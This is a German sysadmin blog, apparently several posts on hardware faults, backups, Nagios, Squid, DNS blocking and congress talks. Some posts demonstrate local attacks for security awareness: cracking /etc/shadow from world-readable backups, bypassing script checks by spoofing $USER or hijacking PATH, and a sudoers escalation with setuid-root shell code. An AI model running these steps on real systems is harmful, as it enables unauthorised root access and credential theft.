Diejenigen, die den Blog über Feedreader abonniert hatten: hier kommt nichts mehr, weiter gehts auf ADMinLIFE. Also los: Reader umstellen!

Nach einigem git bisect’en ergab sich vorhin:

Bisecting: 0 revisions left to test after this (roughly 0 steps)

[1992de83e375acc789daf66b7b72a812a5235b75] USB: qcserial: Enable Diagnostics Monitor and GPS ports on Gobi 2000

Nun muss /dev/ttyUSB1 statt wie bisher /dev/ttyUSB0 genutzt werden. Aber wer liest schon dauernd die LKML oder guckt sich alle Changes vor einem Kernel-Update an?

Achtung: die Western Digital 250 GB Raid Edition Festplatten haben bei mir im Rechenzentrum derzeit eine gefühlte Ausfallquote von 10%. Angeblich ist eine bestimmte Charge von den Ausfällen betroffen, offizielle Angaben gibt es derzeit soweit ich weiß (noch?) nicht.

Unser Lieferant erledigt Garantiefälle für uns recht unbürokratisch – wir schicken nie direkt zu WD, weil wir teils Platten im Vorabaustausch bekommen. Er hat jedenfalls eine größere Menge defekte Festplatten weitergeleitet und nun haben wir für einige Platten als Ersatz 500 GB Modelle bekommen – für lau. Man munkelt, dass aufgrund der extrem hohen Rücklaufzahlen der Bedarf an 250ern derzeit nicht gedeckt werden kann.

Es bleibt spannened. Sobald ich etwas genaueres weiß, werde ich hier was schreiben.

Edit: Falls bei euch in letzter Zeit auch viel ausgefallen ist, schreibt bitte das Alter der Festplatten dazu!


[user@srv2342 ~]$ ls -l /opt/backup
-rw-r--r-- 1 root root 2,6M 09. Apr 20:30 etc-20100409.tgz
-rw-r--r-- 1 root root 2,6M 10. Apr 20:30 etc-20100410.tgz
-rw-r--r-- 1 root root 2,6M 11. Apr 20:30 etc-20100411.tgz
-rw-r--r-- 1 root root 2,6M 12. Apr 20:30 etc-20100412.tgz


Natürlich war auch die /etc/shadow enthalten… john macht damit bekanntlich meist kurzen Prozess.

Beliebt sind scheinbar auch Scripte, die etwas der folgenden Art machen, um Backups zu erstellen und die Rechte korrekt zu setzen:

tar -czf /opt/backup/etc-backup.tgz /etc
chmod 600 /opt/backup/etc-backup.tgz

Hier entsteht eine klassische Race-Condition. Falls der Angreifer die Platten verlangsamt (z.B. per dd) und/oder eine while true Schleife nutzt, die er kurz vor Backupbeginn startet, kann er evtl. Teile oder das gesamte Backup kopieren.

Besser: Global umask 0027 setzen. Falls nicht möglich (z.B. Firmen-Policy), einfach vor dem Aufruf von tar ausführen:

umask 0027
tar -czf /opt/backup/etc-backup.tgz /etc


Backups müssen genauso wie die Originaldaten behandelt werden und gehören nicht nach /tmp oder mit unsicheren Dateirechten sonstwohin.

Tim schlug hier vor, im Vorpost etwas anderes zur Authentifizierung als $USER zu nutzen: id. Auch das ist unsicher, wenn man es falsch macht. Ich benutze hier einfach mal die UIDs statt der Usernamen. Der folgende Code wäre dann die id-Variante, wer findet das Sicherheitsproblem?


#!/bin/bash
if [ "$(id -u)" != "1001" ] && [ "$(id -u)" != "1002" ]
then
echo "Zugriff verweigert."
else
echo OK
[...]
echo "$(date) Domain $1 gelöscht durch $USER" >> /var/log/domainlog
fi


Umgehen kann man es jedoch wieder trivial, man erstelle ~/id:

[stefan@srv2342 ~]$ sh authme.sh
Zugriff verweigert.
[stefan@srv2342 ~]$ echo "echo 1001" > ~/id
[stefan@srv2342 ~]$ chmod +x ~/id
[stefan@srv2342 ~]$ PATH=".:$PATH" sh authme.sh
OK
[stefan@srv2342 ~]$


Wir haben hier PATH so geändert, dass zuerst im aktuellen Pfad nach id Datei gesucht wird – die Datei haben wir grade angelegt und sie gibt aus, was das Script als Antwort sehen möchte. Whoops! ;D

Um die Security awareness etwas zu erhöhen, habe ich überlegt, noch ein paar witzige Schnippsel zu posten! Vielleicht entdeckt ja jemand auch etwas, das er selbst mal gemacht hat!

Hier folgt nun ein sinngemäßer Auszug aus einem Script, das bei einem ISP sehr kritische Aktionen für Domains ausführt:




#!/bin/bash
if [ "$USER" != "franz" ] && [ "$USER" != "karl" ]
then
echo "Zugriff verweigert."
else
[...]
echo "$(date) Domain $1 gelöscht durch $USER" >> /var/log/domainlog
fi


Wichtig ist hier vor allem das Audit Log. Umgehen kann man es jedoch trivial:

USER=franz ./domain-delete.sh [domain]


Leider bedachte der Programmierer nicht, dass $USER natürlich trivial von jedem Shelluser geändert werden kann. Das Audit-Log würde ggfs. sehr unerfreuliche Folgen haben.

Bessere Lösung: sudo benutzen und nur den zwei Usern, die es wirklich benötigen, Rechte auf das Script gewähren.

Auf einem Webserver fand ich kürzlich eine sudoers-Zeile, die einem User erlaubte, chmod und chown für ein bestimmtes Verzeichnis (/foo) auszuführen. Sowas sollte man tunlichst vermeiden.

user@srv2342: ~> id
uid=1007(user) gid=100(users) groups=16(dialout),33(video),100(users)



Ich brauche zuerst ein kleines C-Tool:

user@srv2342: ~> cat > /foo/y.c
#include
int main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
STRG-D


Compilieren:

user@srv2342:/foo> cd /foo; gcc y.c -o y


Jetzt machen wir sudo-magic und erhalten ein SetUID-Bit:

user@srv2342:/foo> sudo /bin/chown 0:0 /foo/y
user@srv2342:/foo> sudo /bin/chmod 4775 /foo/y
user@srv2342:/foo ls -l
total 16
-rwsrwxr-x 1 root root 9217 Mar 26 14:52 y
-rw-r----- 1 user users 101 Mar 26 14:51 y.c


Root werden:

user@srv2342:/foo> ./y
srv2342:/foo # id
uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)

Owned!

Lokal ist hier die IP 192.168.0.220, Remote ist 192.168.0.210.

/etc/rc.conf:

ifconfig_em0="inet 192.168.0.220 192.168.0.210"
static_routes="default"
route_default="-net 0.0.0.0 -iface -interface em0"

Ist auf der anderen Seite Linux im Einsatz, so macht man dort:

ip addr add 192.168.0.210 peer 192.168.0.220/32 dev tunX

Natürlich erst, nachdem das neue tun-Interface oben ist (also z.B. im eigenen up-Script).

Vor einiger Zeit kam das im Juni erschienene Praxisbuch Nagios bei mir an – Aufgrund von Prüfungen, Arbeitsstress etc. bin ich allerdings leider erst kürzlich dazu gekommen, es intensiver zu betrachten; das Schreiben dieses Reviews hat sich dann ebenfalls etwas hingezogen…

Eins vorweg: das Buch ist sowohl für den Einsteiger, als auch für den fortgeschritteneren Admin als Nachschlagewerk oder Inspiration brauchbar, denn es wird auch auf fortgeschrittenere Themen wie z.B. Visualisierung und Pluginprogrammierung eingegangen.

Ausführlich erläutert das Buch anfangs, was mit Nagios möglich ist, was es mit Scheduling, Plugins, Benachrichtigungen, CGIs fürs Webinterface, Zeitperioden, Check-Kommandos, Templates usw. auf sich hat – jeweils ausführlich anhand von Beispielen. Dank der mitgelieferten Live-CD kann man bei Interesse auch zu haus sehr schnell selbst loslegen, ohne ein gesamtes Nagios installieren und konfigurieren zu müssen.Im 2. Teil des Buches wird anhand eines beispielhaften Unternehmens ausführlich beschrieben, wie eine initiale Nagios-Installation einzurichten ist – der gesamte Prozess von der Ist-Aufnahme bis zu Alarmierungsmöglichckeiten im Fehlerfalle. So lernt man z.B. welche Checks wofür Sinn machen, wie sinnvoll mit Templates gearbeitet werden kann und wie genau das Ganze dann in der Praxis umgesetzt wird. In späteren Kapiteln werden auch NRPE (Nagios Remote Plugin Executor), NSCP (NagiosClient++ für Windows) und check_by_ssh erläutert, die wichtig sind, um beispielsweise auf entfernten Servern Festplattenkapazitäten zu überprüfen, weiterhin wird auch auf passive Überwachung per NSCA (Nagios Service Check Acceptor) eingegangen – dadurch kann z.B. eine Firewall von sich aus Meldungen per SNMP Trap an Nagios übermitteln, sodass kein ständiges Polling stattfinden muss. Wie immer, wird alles – auch das ggfs. notwendige Compilieren – ausführlich beschrieben, sodass man nicht Anweisungen wie “Installieren Sie nun snmptt.” allein gelassen wird.

Im 3. Teil wird letztendlich auf graphische Auswertungsmethoden eingegangen, um die man als Administrator über kurz oder lang nicht herumkommt – vor allem, wenn ITIL vor der Tür steht. Hier wird im Detail auf PNP und NagVis eingegangen, auch einige Tuning-Hinweise fehlen nicht.

Zuletzt gibt es noch ein meiner Ansicht nach sehr sinnvolles Kapitel über Plugin-Programmierung incl. Quellcodes – irgendwann kommt man nämlich an die Stelle, an der man für einen bestimmten Service oder eine bestimmte Anwendung – etwa für ein proprietäres Tool zur Raidcontrollerüberprüfung – kein passendes Plugin findet. Eine Übersicht der Konfigurationsoptionen der Nagios-Dateien mit jeweiliger Erläuterung findet sich im Anhang – als Nachschlagewerk praktisch.

Als Admin, der bereits Berührungspunkte mit Nagios hatte, wird man einige Teile zwar überblättern, spätestens aber bei der Pluginprogrammierung und Visualisierung innehalten – auch die über das gesamte Buch hinweg eingestreuten nützlichen “kleine Tipps” wie z.B. den Hinweis auf NagiosChecker für Firefox (den ich selbst seit längerer Zeit benutze) erweitern das Wissen über das Nagios-Universium.

Meine einzige Kritik ist, dass im Kapitel zu NRPE unerwähnt bleibt, dass solche Checks auch z.B. über ein bereits installiertes net-snmp per exec ausgeführt werden könnten – dies ist jedoch zugegebenermaßen weitaus weniger flexibel und erfordert ggfs. eine Softwaredeploymentlösung, möchte man auf einem konsistenten Stand bleiben.

Ich kann das Buch für Einsteiger und weniger erfahrene Nagios-Admins nur ausdrücklich empfehlen, selbst als erfahrener Nagios-Hase kann man aber evtl. noch ein paar interessante Sachen erfahren; der weit fortgeschrittene Admin mit >2000 Checks in seinem Nagios wird sich zwar einen Großteil des Buches bereits selbst erarbeitet haben, könnte aber ggfs. trotzdem noch z.B. beim Templating, der Pluginprogrammierung oder Visualisierung etwas dazulernen.

Hier ein Tipp für Sysadmins, die url_rewrite in Squid nutzen: schaut euch genau an, wie performant eure Scripte sind und benchmarkt diese unbedingt!

Ich hatte die Tage ein Problem mit einem Squid, der ungewöhnlich hohe Load verursachte – es lag an ineffizienter Programmierung des Rewriters. Für eine Hand voll URLs sollte er Umleitungen vornehmen, etwa von ^http://domain/formular auf https://domain/formular.

Das ursprüngliche Script war in BASH programmiert – es verwendete externe Programme wie grep, sed – und war für geringe Bandbreiten (5MBit/s) performant genug. Die Bandbreite stieg jedoch bald auf 20MBit/s, was die Last schon sehr deutlich erhöhte, und es werden voraussichtlich bald ~200MBit/s sein.

Das Script wurde daraufhin in Perl reimplementiert und läuft laut Benchmark um den Faktor 180 (!) schneller. Als Benchmark empfiehlt sich:

[code language="shell"]time tail /var/log/squid/access_combined.log -n 100000 | awk '{print $7}' | /pfad/zum/url_rewriter.pl > /dev/null[/code]

Wenn dort (z.B. bei einem komplizierterem Script) Werte von mehr als 5 Sekunden stehen, sollte man sein Script für hohe Bandbreiten ggfs. überarbeiten und/oder in einer performanteren Sprache reimplementieren, z.B. in C oder für Extremfälle in Assembler.

• Programmieren einer Schnittstelle, die die Regeln ausliest und in ein Repo eincheckt
• Automatische Backups durch die Firewall erzeugen lassen (oftmals per Mail möglich) und einchecken in ein Repo
• Eingeben der Firewallregeln in ein Dokumentationssystem
• Eingeben der Firewallregeln in ein System, welches die Regeln dann auf der Firewall anlegt
• Keine Dokumentation

Mich würde interessieren, wie ihr hier vorgeht? Z.B. für eine Zertifizierung nach dem IT-Grundschutzhandbuch sind solche organisatorischen Dinge nicht ganz unwichtig.

Und zwar:

- 2 Asus AM2 Boards (Alternate): jeweils mit defektem Spannungswandler

- MSI-AM2 Motherboard (Alternate): der Lüfter läuft nach 1-2 Wochen zu schnell, da das Board dann falsche Sensorwerte über die Temperatur meldet

- Komplett-PC Sockel 775 (Mindfactory): diverse BIOS-Einstellungen falsch (DANKE an Mindfactory dafür, System war so nicht lauffähig) defekter Spannungswandler des Mainbords (Gigabyte)

- Bundle (Alternate): Asrock AM3 Board, DDR3, x2 250 von Alternate: Spring nichtmal an, kein BIOS-Piepser…

*Seufz*. Vor allem die extrem laut fiependen Spannungswandlern sind echt nervig – bei Asus scheinen einige Serien komplett davon betroffen zu sein.
Allgemein habe ich so das Gefühl, dass die Qualität und Kompatibilität der PC-Komponenten ab der DDR2-Genaration deutlich abgenommen hat…

Nun gibt es eine Petition gegen die Zensur durch die Hintertür: hier mitzeichnen! Heute morgen waren es bloß ca. 1.000 Mitzeichner, nun sind es bereits über 12.000. Laßt euch bitte nicht davon entmutigen, dass die Seite etwas lahm ist und man sich anmelden muss! Verbreitet die Seite außerdem bitte weiter, erzählt davon und klärt darüber auf, was es mit den DNS-Sperren auf sich hat!

Ausgenommen sind Anbieter mit weniger als 10.000 Nutzern, außerdem staatlichen Dienste wie Hochschulnetze und Behörden-Provider sowie einige hundert regionale Netzanbieter.

Völlig inkonsequent. Kinderpornos nur für Politiker und Studenten, hurra!? Kostet ja auch alles Geld und Zeit, was der Bund nicht ausgeben will. Aber die freie Wirtschaft “darf” es “freiwillig” tun, sonst wird sie als Kinderporno-Unterstützer abgestempelt! Vielleicht wollen die Politiker die nächsten Internetsperren für z.B. Onlinepoker nicht bekommen, oder fänden es vielleicht zu schwierig, die lächerlichen DNS-Sperren zu umgehen? Die Zypris weiß ja noch nicht einmal, wie dieses Internet-Surfdings heißt!

Interessant wäre jetzt zu wissen, ob man als Betreiber eines komplett öffentlichen DNS-Resolvers nun irgendwas machen muss, denn man bietet ja im Grunde vielen Millionen Nutzern einen Dienst an…

Quelle:
Spiegel

Wim Vandeputte hat derzeit wohl ein paar Probleme mit Theo de Raadt, dem OpenBSD Führer – es geht um Merchendiseeinnahmen. Traurig, dass es letztlich immer ums Geld gehen muss!

Wim kenne ich übrigens persönlich flüchtig von den Chaos Communication Congressen & Camp und würde ihn als aufrichtigen, netten Menschen beschreiben – von Theo bekommt man ja leider immer nur das Gegenteil mit. Ich bin gespannt, wie sich das Ganze entwickelt!

Wer die Details lesen will, kann dies auf accounting.kd85.com tun.

Meine Diagnose ab sofort lautet “Format C:” !
Siehe auch: arschkrebs.de

Besonders tragisch finde ich, dass auch die Raid Edition 2 betroffen ist, die man ja grade für professionell eingesetzte Systeme kauft… :/

Peinlich: mit der 1,5TB-Serie gab es kürzlich auch gravierende Probleme – bei Disk flushs fror die Platte ein. Machen die überhaupt QS?!?

Bei uns steht übrigens grade die Anschaffung von ~20 Servern vor der Tür, ich weiß schon, Festplatten welches Herstellers nicht gekauft werden.

Die Bahn hatte einen bundesweite Störung ihrer Computersysteme zu beklagen, der massive Störungen beim Fahrkartenverkauf und der Zugabfertigung mit sich brachte. So weit so gut. Das Problem ist bisher allerdings noch nicht ausgemacht, für die Bahn selbst ist das Problem noch “mysteriös” – ihr Sprecher verkündete aber sogleich, dass so ein Ausfall nicht nochmal vorkommen werde!

Mutig!

Wild Guess: ein von einem Bahnarbeiter per USB-Stick eingeschleuster Wurm hat im internen Netz (“muss man ja nicht patchen, kommt ja keiner ran!”) etwas gewütet…

Quelle: Tagesschau

Erwähnenswert auch noch:

• Dunking Donuts DDoS
• Die Vortragenden des iPhone-Hacking-Vortrags sind auf dem Video aus offensichtlichen Gründen nicht zu sehen
• Der Wikileaks-Vortrag wurde garnicht aufgenommen, um die Privatsphäre der Vortragenden zu schützen
• Das LKA hat wohl (halbherzig und erfolglos) versucht, die Wikileaks-Leute wg. der BND-Geschichte zu verhaften, leider habe ich keine genaueren Details
• “Der Dritte Raum” hat unter falschem Namen in der Lounge aufgelegt!
• Der Serverraum des Hackcenters war wie immer das totale Chaos – frei nach dem Motto “Kabelsalat ist gesund!”

Rack mit Patchpanel und Core-Switches mit 10GE Uplinks für das Hackcenter:

SAN mit jeder Menge Plattenplatz:

Colocation für ein paar Server:

Achja…schön wars!

Noch ein paar weitere, gesehene Vorträge:

• Banking Trojans 101 – Thorsten Holz -> Eigentlich nur eine Zusammenfassung bereits bekannter Sachen…interessant war aber “then a mystery happens and we get access to the dropzone”, was auch nicht näher erläutert wurde…
• Fnord News Show – Felix von Leitner / Frank Rieger -> Genial wie immer! Jeder sollte ein paar Fnords sehen…mit am Besten war die Diebold-CIA-Koks-Connection!
• Cisco IOS attack and defense – FX of Phenoelit -> Outstanding. Wiedereinmal hat FX neue, Erkenntnisse zum IOS-Hacking publik gemacht. Jeder Netzwerker sollte sich den Talk ansehen!
• Hacker Jeopardy – Stefan ‘Sec’ Zehl / Ray -> Pure Fun, as usual!
• Security Nightmares 2009 – Frank Rieger / Ron -> Hoffentlich funktioniert die Glaskugel nicht korrekt…
• Closing Ceremony / Sandro Gaycken -> wie immer, die Interessante Zusammenfassung der Congressereignisse. Es wurde auch der komische Typ erwähnt, der im Hackcenter und am NOC Helpdesk Hacks gegen Geld kaufen wollte (und daraufhin mit einem “FED”-Schild markiert wurde *gg)

Einige weitere Streams habe ich mir im Hackcenter sitzend angehört, schreibe dazu jedoch erstmal nichts, weil ich einfach dauernd abgelenkt wurde…

Des weiteren war noch der Workshop Bastard ISPs from Hell bemerkenswert, darin ging es um Trafficmanipulationen, die durch ISPs vorgenommen werden können – das Ganze wurde dann auch noch testweise selbst durchgeführt…

Ich befinde mich derzeit auf dem 25C3…gesehene Vorträge bisher:

• Why were we so vulnerable to the DNS vulnerability? – Dan Kaminsky -> Exzellent
• Attacking Rich Internet Applications – Stefano Di Paolo / Kuzo55 -> Inhalt war OK, allerdings etwas langweilig Vorgetragen – vor allem Stefano Di Paolos Italenglisch war grauenhaft und machte garkeinen Spass
• Vulnerability discovery in encrypted closed source PHP applications – Stefan Esser -> Exzellent, gute technische Details
• TCP Denial of Service – Fabian Yamaguchi -> Gut, wenngleich die Inhalte schon bekannt waren
• Banking Malware – Thorsten Holz -> Läuft grade

Es ist übrigens EXTREMST voll, die Dauertickets sind schon längst allesamt verkauft – wer bei Vorträgen einen Sitzplatz ergattert, darf sich glücklich schätzen! Bei einigen Vorträgen mußten auch Leute rausgeworfen werden, weil es zu voll war und alle Ausgänge komplett verstopft waren…
Es blieb ihnen wenigstens noch der Videostream, der übrigens erstaunlich stabil läuft.

Leider gibt es keine Informationen darüber, wie die Angreifer die Server gehackt haben, wer etwas darüber weiß, möge hier bitte kommentieren!

…bin ich nun auch noch! Hurra²! Ich habe heute beide Prüfungen nacheinander sehr gut bestanden (und jeweils in einem Drittel der Zeit) und lehne mich nach dem Zertifikatsmarathon nun erstmal in Ruhe zurück. Nächste Woche gibt es erstmal Urlaub! Eigentlich fehlt mir noch der Cluster Administrator… Vorher ist aber wohl noch mein Hasskanidat LPIC-202 dran.

…bin ich seit heute morgen! Hurra! Ok, wahnsinnig schwer war es nicht, in 3 der 6 Bereiche hatte ich sogar 100%, wirklich schlecht war ich aber bei den SQL-Fragen, die wohl eher für die Anwendungsentwickler gedacht waren. Naja egal, wieder ein Schein mehr!